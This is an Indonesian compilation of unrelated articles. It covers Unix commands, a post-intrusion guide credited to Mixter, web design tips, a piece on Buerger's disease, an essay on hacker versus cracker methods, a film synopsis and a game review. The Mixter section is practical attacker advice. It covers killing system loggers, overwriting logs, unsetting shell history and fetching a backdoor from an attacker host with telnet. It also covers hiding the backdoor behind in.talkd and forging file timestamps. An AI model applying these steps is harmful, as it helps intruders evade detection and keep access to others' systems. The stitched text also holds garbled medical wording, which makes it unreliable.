230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp juga bisa dilakukan dengan melakukan telnet ke port 21
cyberservices:~$ telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed
May 20 13:45:04 CDT 1998) ready.
------> talk
Berbicara dengan user lain, misalnya cyberbug request talk ke root sbb:
talk root
atau
talk root@cyberservices.com
[Waiting for your party to respond]
[Ringing your party again]
Di terminal root akan muncul pesan :
Message from Talk_Daemon@cyberservices at 4:00 ...
talk: connection requested by cyberbug@localhost.
talk: respond with: talk cyberbug@localhost
root harus mengetik talk cyberbug@localhost jika ingin menjawab request
talk cyberbug@localhost
[Connection established]
:: Perintah Tambahan dari Saya ( r3v0lt aka Intruded)
1. Perintah Untuk Kompilasi File
ex. #gcc -o namafile filekompilasi
#gcc -o pscan pscan.c
2. Perintah Running file eksekusi
ex. #./file
#./pscan
#./scaner.pl
#./scanner.sh
3. Perintah Hentikan proses
ex.# Ctrl+c
4. Perintah Proses sementara
ex.#ctrl+z ,balik ke shell ketik fg (pada FreeBSD)
5. Perintah ganti Shell (pada FreeBSD)
ex.#chsh ---> ksh,bash,tcsh
6. Perintah Ganti Passwd
ex.#passwd
7. Perintah melihat ip suatu host
ex.#dig ip
ex.#nslookup ip
8. Perintah editor
ex.#pico wepedodol.c
9. perintah pipa, dua proses sekaligus
ex.# ls -al |head file
akan menanmpilakn direktori bagian atas nya saja
10.perintah ganti mode
ex.#chmod +x file
r - read, permissions utk 'baca'
w - write, permission utk 'tulis'
x - (e)xecute, permission utk 'menjalankan'
:: Begitu aja dolo yaaa ok say.....
::: Keterangan Lae Kita Mixter =
Here are my suggestions...

1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turned off. Now you can act freely.
copy secure.1 and messages.1 from /var/log over secure and messages Normally, these logs are the only ones with the intruders IP
and traces of a root compromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE is important.
Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional :).
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about the frequency the system is being
maintained, administrated, if the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! you might want to remove other backdoors.
* Look for a loghost or snmp (dangerous because you cant manipulate the logs on a far-away loghost). Watch out for *logd, sniffers,
netmon's etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc).
3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH!
It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that
root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach
to uploading files is doing:
(on your box)

$ uuencode -m backdoor.c backdoor.c | less

(on the target box)
uudecode

# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to
it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c As I said, make sure you can get back in. If the box you rooted
has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the
vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses
with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom
ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running.
You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method.

4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is
installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously, because it doesn't need user interaction. If you want, add an additional backdoor in your "patched" server. QPOP 2.53 even supports this itself.
For all files you replace, you should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but if the
admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job. :P
To modify timestamps, you do a simple:

touch -r /bin/bash /path/to/your/trojan

this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command
to a rc.d script as well. Bind doesn't need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works
fine with 53/tcp firewalled. But be aware that this might get you detected, lets say if you disable port 110 or 143 on an ISP's
central mail exchange server...

About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful.
People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more.

For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5].



------------------------------------------------------------------------------------------
..::: JasaKom :::..


r3v0lt
aka Intruded

* http://private.localbox.net (staff only - no link)
* http://published.localbox.net (free exploits - k00lz
* http://restriction.localbox.net (staff only - no link)

Credit Mixter & CyberBug (was confirmation Sept 2001)
File = Public ! or MaYBe go to: http://published.localbox.net
-------------------------------------------------------------
/*
Dipersilahkan untuk mengkopi paste dan menyebarluaskan secara tak terbatas
artikel ini asal dengan tujuan pendidikan dan menyertakan credit atas
r3v0lt aka Intruded. Penulis dan editor tidak bertanggung jawab atas
penyalahgunaan versi pendidikan artikel ini.
*/

Pembuatan Sistim Pemodelan Dinamis Berbasis Web

Seiring dengan perkembangan aplikasi-aplikasi yang berjalan pada media website, maka tidak heran jika kebanyakan orang lebih mencari tool yang siap pakai di atas media web browser (perangkat online). Oleh karena itu dalam perancangan ini dibuat suatu sistem pemodelan dinamis berbasis web. Sistem ini bekerja untuk menyelaikan fenomena-fenomena alam yang dinamis, karena hampir semua fenomena alam adalah sistem dinamik tak linier, yang artinya mengalami perubahan terhadap waktu dengan hubungan variabel-variabel yang terlibat memberi pengaruh yang tidak proporsional, seperti halnya siklus banjir tiap tahunan, populasi, dsb.

Permasalahan-permasalahan tersebut sangatlah penting untuk dikaji dan diprediksi dalam sebuah pemodelan matematis yang setidaknya dapat diambil sample sebagai data acuan keberlangsungan permasalahan-permasalahan dinamis tersebut untuk menentukan atau paling tidak memprediksi data yang akan terjadi di kemudian. Sistem disini secara umum bekerja dengan fungsi perulangan for sehingga dihasilkan data iterasi yang kontinue sampai batas yang ditentukan, sehingga diperoleh sebaran data dalam interfal waktu tertentu.
Proses itu dilalui oleh 3 tahapan, yaitu
(1) pengisian form setting konfigurasi dan input inisialisasi dan kode program, (2) informasi input dikelolah dan hasil data di masukkan dalam database, dan
(3) data di database ditampilkan dalam tabel dan visualisasi grafik. Kata Kunci: Sistim, Dinamis, Web, Browse


SUMBER : beta.eepis.ac.id

Mendesain ala WebDesigner

Sering kita temui website yang tipikal: "Welcome to my homepage," animasi e-mail, background dengan tulisan miring (diagonal), animasi garis pembatas, tabel dengan border tiga-dimesi dan lain-lain. Hal ini terjadi akibat dari fasilitas Template yang disediakan oleh software pembuat web seperti: FrontpageT, Corel WebDesignerT, dan sebagainya yang ditujukan untuk mempermudah penggunanya dalam membangun website.
Jika anda puas dengan hasil kerja anda membangun website dengan fasilitas template, sudahlah cukup sampai disini. Tetapi jika anda tidak puas dengan apa yang anda buat, dan anda merasa ingin lebih baik, maka anda perlu mengetahui bagaimana Web Designer membangun suatu Website, terlepas anda punya bakat seni atau tidak.
1. Unik : Dalam membuat karya apapun seorang designer mempunyai kesadaran untuk tidak meniru atau menggunakan karya orang lain. Begitu pula seorang Web Designer harus mempunyai budaya malu untuk menggunakan icon, animasi, button, dll, yang telah digunakan atau dibuat oleh orang lain.
2. Komposisi : Seorang Web Designer selalu memperhatikan komposisi warna yang akan digunakan dalam website yang dibuatnya. Pergunakan selalu Palette 216 WebColor, yang dapat diperoleh dari Adobe.com, hal ini untuk mencegah terjadinya dither pada image yang berformat GIF. Dalam membangun website suatu perusahaan, Web Designer selalu menyesuaikan warna yang digunakan dengan Corporate Color perusahaan tersebut. Sebagai contoh: Telkom Corporate Color-nya adalah biru, Coca-Cola : merah dan putih, Standard-Chartered : hijau dan biru, dsb. Untuk kemudian warna-warna tadi digunakan sebagai warna dominan atau sebagai elemen pendukung (garis, background, button, dsb).
3. Simple : Web Designer banyak yang menggunakan prinsip "Keep it Simple", hal ini ditujukan agar tampilan website tersebut terlihat rapi, bersih dan juga informatif.
4. Semiotik : Semiotika adalah ilmu yang mempelajari tentang tanda-tanda. Dalam hal ini diharapkan dengan melihat tanda atau gambar, user/ audience dapat dengan mudah dan cepat mengerti. Sebagai contoh: Jangan membuat gambar/image yang berkesan tombol, padahal itu bukan tombol/ link.
5. Ergonomis : Web Designer selalu memperhatikan aspek ergonomi. Ergonomi disini adalah dalam hal kenyamanan user dalam membaca dan kecepatan user dalam menelusuri website tersebut. Web Designer memilih ukuran Fonts yang tepat sehingga mudah dibaca, Web Designer menempatkan link sedemikian rupa sehingga mudah dan cepat untuk di akses dan lebih penting lagi adalah Informatif.
6. Fokus : Tentukan hirarki prioritas dari pesan yang akan disampaikan, misalnya: Judul harus besar, tetapi jangan sampai akhirnya akan konflik dengan subjudul yang berukuran hampir sama. Hal ini akan membingungkan user/audience untuk menentukan pesan mana yang harus lebih dahulu dibaca/ dilihat.
7. Konsisten : Tentukan font apa yang akan digunakan sebagai Body-text, Judul, Sub Judul dan sebagainya, sehingga website tersebut akan terlihat disiplin dan rapi. Sesuaikan jenis huruf yang digunakan dengan misi dan visi website tersebut, misalnya: hindari menggunakan font Comic dalam membangun website suatu perusahaan resmi.
Demikian beberapa aspek dan prinsip yang digunakan Web Designer dalam membuat website, selebihnya merupakan ekspresi dari pembuat website itu sendiri yang terwujud dalam penggayaan penyusunan website.

Sumber : tidak diketahui

Cegah rokok , bebas sakit Buerger!



Ifan baru saja pulang dari kuliah, tetapi dia merasa kedinginan dan jarinya seperti kebiru-biruan. Tentu saja ibunya cemas melihat kondisi anaknya. Dia pikir anaknya itu masuk angin biasa, maka dia kaget ketika diperiksa ke dokter, ternyata Ifan didiagnosa menderita penyakit Buerger.

Dari namanya, penyakit ini memang masih jarang terdengar oleh orang awam. Namun demikian, penyakit ini perlu pula diketahui masyarakat luas. Penyakit Buerger, atau tromboangitis obliterans, ditandai dengan terjadinya radang pembuluh darah arteri, kapiler dan saraf, yang menyebabkan penebalan dinding pembuluh darah. Hal ini disebabkan oleh infiltrasi sel darah putih.

Penyebab penyakit Buerger tidak diketahui, namun karena paling banyak menyerang remaja pria yang merokok, maka penyakit ini diyakini merupakan reaksi terhadap sesuatu yang terkandung dalam rokok atau sebagai akibat dari gangguan genetik atau gangguan otoimunitas.

Gejala awal biasanya adalah warna kebiru-biruan pada jari kaki, jari tangan dan munculnya rasa dingin pada anggota tubuh yang terserang. Karena saraf juga meradang, bisa muncul rasa sakit dan penyumbatan pembuluh darah kecil yang dikendalikan oleh saraf-saraf tersebut. Saraf simpatis yang terlalu aktif juga bisa menyebabkan kaki berkeringat secara berlebihan, meskipun kedinginan. Karena pembuluh darah tersumbat, klaudikasio intermiten dan gejala-gejala lain yang menyerupai penyakit arteri obstruksi kronis tersebut sering muncul. Luka iskemik dan gangren merupakan komplikasi umum penyakit Buerger yang makin parah.

Pengobatan yang paling penting adalah menghentikan kebiasaan merokok; jika ini dilakukan sejak awal munculnya penyakit, yaitu sebelum pembuluh darah dan saraf rusak parah, gejala-gejala ini biasanya mudah diobati. Jika terjadi gangguan sirkulasi atau rasa sakit, maka perlu dilakukan operasi server saraf simpatis yang menyebabkan pembuluh darah kecil tersumbat.

Penelitian-penelitian yang dilakukan baru-baru ini menunjukkan bahwa akupungtur bisa meningkatkan aliran darah pada penyakit Buerger dan fenomena Reynaud. Sebaliknya, tidak ada terapi alternatif yang benar-benar bisa menyembuhkan penyakit ini.
Karena penyakit ini sangat berkaitan dengan kebiasaan merokok, menghentikan kebiasaan ini merupakan langkah pencegahan yang paling efektif.
Penyakit ini paling sering menyerang pria berusia 20 dan 40 tahun yang merokok. Kasus yang terjadi pada wanita hanya kira-kira 5%.

Sumber : tidak diketahui

Belajar Menjadi Hacker

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.
Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Dijelaskan oleh Front-line Information Security Team, "Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks," fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.
Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk
(1) hosting web server mereka,
(2) komunikasi e-mail dan
(3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.
Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah 'ls ' , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah 'expn ', dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai 'root' (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan 'clean-up' operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang 'backdooring'. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.
Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah 'rm -rf / &'. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan 'rm -rf / &'.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, "To boldly go where no one has gone before".

Sumber : Onno W. Purbo

Referensi Film Avatar



AVATAR
Jake Sully (Sam Worthington), mantan angkatan laut Amerika yang terluka dan cacat akibat perang. Ia terpilih untuk berpartisipasi dalam program Avatar, yang memungkinkannya bisa berjalan kembali. Jack menuju ke Pandora, sebuah hutan nan subur yang penuh dengan berbagai macam makhluk hidup, sebahagian indah dan sebahagian lagi menakutkan. Pandora juga rumah bagi suku Na’vi, makhluk yang mirip manusia dengan kehidupan primitif serta memiliki kemampuan seperti manusia. Saat manusia mencoba memasuki Pandora untuk meneliti kandungan mineral yang ada disana, suku Na’vi memerintahkan para prajuritnya untuk melindungi negerinya dari ancaman.
Jake direkrut untuk menjadi bagian dari proyek ini. Karena manusia tidak dapat menghirup udara di negeri Pandora, maka mereka menciptakan makhluk-mirip-suku Na’vi yang mereka sebut sebagai Avatar. Di Pandora, dengan tubuh Avatar, Jake dapat berjalan kembali. Di hutan Pandora, Jake melihat banyak keindahan dan bahaya. Ia juga bertemu dengan wanita muda Na’vi bernama Neytiri (Zoe SaldaƱa).
Berjalannya waktu, Jake berbaur dengan suku Na’vi dan jatuh cinta kepada Neytiri. Pada akhirnya, Jake terjepit antara tujuannya dikirim oleh militer ke Pandora dan suku Na’vi, memaksanya untuk memihak pada satu pilihan yang akan menentukan nasib bumi dan suku Na’vi.

Jenis Film :Action/animation
Produser :James Cameron, Jon Landau
Produksi :20th Century Fox
Homepage :http://www.avatarmovie.com/
Durasi :150
Pemain :
Sam Worthington
Zoe Saldana
Sigourney Weaver
Michelle Rodriguez
Stephen Lang
Joel David Moore

Sutradara :James Cameron
Penulis :James Cameron
Sumber :
http://www.21cineplex.com/

Review Game Runes of Magic




Overview
Jika kamu menganggap World of Warcraft sebagai MMORPG terbaik yang pernah kamu mainkan, maka kamu pasti akan menyukai dan menjadikan Runes of Magic sebagai Free-to-Play MMORPG terbaik di Indonesia saat ini.
Runes of Magic menawarkan fitur utama pilihan 30 kombinasi dual class dan sedikitnya 2000 quest beragam di dalam dunia 3 dimensi Taborea yang penuh petualangan dan intrik. Tidak ketinggalan yang harus diperhatikan adalah Runes of Magic dengan model bisnis Free-to-Play seperti game online lokal lain pada umumnya, namun memiliki sistem Item Mall yang agak berbeda, menarik, dan inovatif.

Graphics & Sound
Pendekatan grafis Runes of Magic sekali lagi bisa dibandingkan dengan MMORPG raksasa milik Blizzard World of Warcraft ketika pertama kali dirilis, yaitu menimbulkan perdebatan antar pemain, ada yang suka ada yang tidak. Runes of Magic memang tidak mengusung grafis terbaik namun ada keuntungannya yaitu desain senjata dan armor lebih detil dan bisa dimainkan pada spesifikasi komputer yang lebih rendah.
Kualitas efek suara dan musik latar belakang dalam Runes of Magic sudah cukup baik, tidak terlalu membosankan, namun tentu saja ini tergantung selera masing-masing pemain.

Character Creation
Pembuatan karakter dalam Runes of Magic cukup standar seperti pemilihan model rambut, wajah, dan pilihan ukuran tubuh yang cukup detil. Kemudian bagian yang lebih menarik, tersedia 6 pilihan class yaitu Warrior, Knight, Mage, Priest, Scout dan Rogue. Pertama-tama kamu memilih satu sebagai Primary Class dan setelah mencapai level 10 dapat memilih satu lagi sebagai Secondary Class, gabungan kedua class ini akan memberikan pengalaman bermain yang unik. Satu hal yang cukup disayangkan di sini adalah pemilihan ras yang hanya satu yaitu Human saja, namun memang Runes of Magic sudah mempersiapkan penambahan satu ras lagi yaitu Elf dan dua class baru Druid dan Warden yang mungkin akan dilakukan tidak lama lagi. Di dalam dunia Taborea saya melihat banyak sekali ras-ras lain yang cukup menarik apabila bisa dijadikan playable karakter seperti Minotaur dan Chapra.

Dual Class System
Kombinasi dual class ini tidak sembarangan, sebagai developer Runewaker memastikan bahwa setiap kombinasi memiliki kelebihan, kekurangan, dan keunikannya sendiri sehingga kombinasi Warrior/Mage tidak akan sama dengan Mage/Warrior. Hal inilah yang menjadi daya tarik utama Runes of Magic.
Setiap class dalam Runes of Magic memiliki dua kategori skill, yaitu General yang dapat digunakan ketika sedang dalam mode Primary maupun Secondary, dan Specific yang hanya dapat digunakan ketika class tersebut sedang dalam mode Primary.
Sebagai contoh sebuah karakter Warrior, ketika mencapai level 10 dia akan bisa mengambil sebuah Secondary class, katakanlah dia memiliih Mage. Sehingga level karakter tersebut menjadi 10 Warrior / 1 Mage. Untuk menaikkan level Mage dia perlu mengubah Mage menjadi Primary sehingga level karakter tersebut menjadi 1 Mage / 1 Warrior. Level Warrior akan ikut meningkat seiring naiknya level Mage hingga mencapai level 10 Mage / 10 Warrior, sebuah Secondary class tidak bisa dinaikkan melebihi Primary Class.
Masing-masing kombinasi dual class memiliki sebuah set skill unik yang dinamakan Elite Skills. Kumpulan skill ini memiliki kemampuan yang unik yang tidak akan dimiliki oleh kombinasi dual class lain, jadi seperti dikatakan tadi Elite Skill yang dimiliki oleh Warrior/Mage akan berbeda dengan Mage/Warrior.
Tidak hanya job untuk bertarung, karakter dalam Runes of Magic dapat juga mengambil pekerjaan Crafting yang bervariasi seperti Alchemist, Cooking, Carpenter, Blacksmith, Armorcrafter, dan banyak lagi. Terlihat di sini Runewaker tidak main-main dalam mengembangkan fitur pengembangan karakter di Runes of Magic.

Gameplay
Kontrol pergerakan dan pertarungan karakter dalam Runes of Magic sangat mengadopsi MMORPG barat seperti World of Warcraft dengan menggunakan tombol WSAD dan tombol angka sebagai action bar, tidak seperti MMORPG Korea yang lebih sering menggunakan mouse click untuk bergerak dan bertarung.
Runes of Magic sangat mengutamakan leveling menggunakan quest, tersedia sedikitnya 600 quest bagi pemain untuk menaikkan karakter sampai dengan level 50. Quest yang ditawarkan juga tidak monoton sekedar membunuh monster X sebanyak Y kali terus menerus, ada beberapa quest yang dikategorikan Epic yang memiliki alur cerita menarik dan tidak jarang mengajak pemain melakukan tindakan-tindakan tidak biasa seperti mengawal NPC, menyamar untuk mendapatkan informasi, dan lain-lain.
Kemudian ada juga yang dinamakan Quest Harian dimana setiap karakter dapat melakukan quest ini sebanyak sepuluh kali dalam sehari.
Raid Boss dan Instance Dungeon juga menjadi fitur andalan di dalam gameplay Runes of Magic, kamu tidak akan menemukan senjata dan equipment terhebat di dalam daftar Item Mall. Kamu harus mendapatkannya sendiri dengan mengalahkan Raid Boss ataupun menyelesaikan Instance Dungeon bersama teman.
Interaksi-interaksi dengan Raid Boss ini pun sangat beragam, sebagian mudah namun beberapa diantaranya diperlukan strategi serta kekompakkan antar anggota party agar dapat mengalahkannya. Contohnya adalah salah satu Boss di Instance Dungeon Ice Dwarf Kingdom yang akan membekukan salah satu anggota party secara random kemudian salah satu anggota lainnya harus berlari ke arah tungku untuk mendapatkan hawa panas dan kemudian berlari mendekati anggota party yang sedang beku untuk membebaskannya, tentu saja selama proses itu Boss tidak akan tinggal diam dan terus melancarkan serangan yang mematikan sehingga kekompakkan, keahlian, kesigapan, dan kecepatan masing-masing anggota sangat diperlukan.
Yang perlu diperhatikan juga Runes of Magic adalah MMORPG pertama di Indonesia yang mengadopsi sistem Bound untuk senjata dan equipment karakter, khususnya yang dikategorikan langka. Artinya jika karakter kamu berhasil mendapatkan item drop dari sebuah Raid Boss, maka item tersebut sudah Bound atau terikat dengan karakter tersebut sehingga tidak mungkin lagi untuk diberikan atau dijual kepada karakter lain. Ini adalah fitur yang bisa disukai maupun tidak disukai oleh beberapa pemain, namun yang pasti hal ini sangat membatasi banjirnya sebuah item yang seharusnya langka karena bisa digunakan terus menerus. Dengan sistem Bound ini, item langka tetap menjadi langka karena tidak bisa diwariskan dan hanya bisa dijual ke NPC bila tidak ingin digunakan lagi.

Player vs Player
Selain fitur PvE, Runes of Magic juga menawarkan fitur PvP dari bentuk yang sederhana yaitu duel sampai dengan server khusus PvP.
Duel dapat dilakukan oleh dua karakter pemain yang tidak berbeda level terlalu jauh, pemain yang berhasil menurunkan HP lawan sampai dengan 1% dianggap pemenangnya.
